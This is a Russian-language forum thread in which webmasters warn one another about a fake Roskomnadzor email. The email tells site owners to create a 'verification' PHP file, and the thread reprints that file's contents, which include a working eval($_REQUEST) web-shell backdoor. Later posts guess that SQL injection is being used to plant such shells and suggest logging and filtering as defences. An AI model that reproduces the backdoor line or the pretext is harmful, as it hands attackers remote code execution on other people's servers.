взломщик
Цитата: BelarusBUX.com от 02.11.2015, 21:13Мой знакомый прислал интересную информацию
И так на почту многим должно придти следующая информацияВы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени webof-sar.ru в сети «Интернет».По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:
1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:
< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>
2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
Мой знакомый прислал интересную информацию
И так на почту многим должно придти следующая информация
По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:
1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:
< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>
2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
Цитата: nanotek от 02.11.2015, 21:47Мне тож такие файлы заливали))) На твоём старом движке ещё....
Так что скорее всего дыра в каком то из старых твоих файлов.
Мне тож такие файлы заливали))) На твоём старом движке ещё....
Так что скорее всего дыра в каком то из старых твоих файлов.
Цитата: WiNNeR_tig от 02.11.2015, 22:11BelarusBUX.com,
2 раза такое приходило, хороший способ ))
BelarusBUX.com,
2 раза такое приходило, хороший способ ))
Цитата: nanotek от 02.11.2015, 22:51SpawN,
Может форум?WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
SpawN,
Может форум?
WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
Цитата: Sergeych от 02.11.2015, 23:04SpawN, а кто хостер?
Цитата: Pretorianлоги загрузки на сервер
по дате загруженных файлов можно в логах смотреть...
SpawN, а кто хостер?
по дате загруженных файлов можно в логах смотреть...
Цитата: steam от 03.11.2015, 04:06Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers
В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers
В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
Цитата: BelarusBUX.com от 03.11.2015, 13:10Цитата: steamВ конце концов вычисли ip кулхацкера
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель...
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель...
Цитата: Pretorian от 03.11.2015, 13:18потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате код вредосный срабатывает как код а не как текст, и само собой создает шел, и удаляется с базы. Это мое мнение, хз как там, держите в курсе что там...
потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате код вредосный срабатывает как код а не как текст, и само собой создает шел, и удаляется с базы. Это мое мнение, хз как там, держите в курсе что там...